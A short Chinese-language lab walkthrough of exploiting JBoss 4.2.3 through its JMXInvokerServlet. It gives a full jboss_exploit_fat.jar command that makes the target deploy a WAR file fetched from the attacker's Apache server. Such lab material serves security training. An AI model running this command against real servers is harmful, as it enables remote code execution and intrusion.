首先打开靶机中的jboss
然后依次进入C:\jboss-4.2.3.GA\server\default\deploy\jboss-web.deployer将其中的server.xml配置文件中的访问IP地址改为任意IP地址(然后重启一下我们的jboss,这里我们的靶机就配置好了)
然后我们使用攻击主机,首先打开我们主机的phpstudy,将apache服务打开
将war包传入到我们的www目录下
再将我们设置好的exp下载下来
直接window+R打开运行,输入cmd进入命令行界面
输入:
java -jar jboss_exploit_fat.jar -i http://192.168.0.200:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.0.1/test3693.war
然后进入jboss查看一下: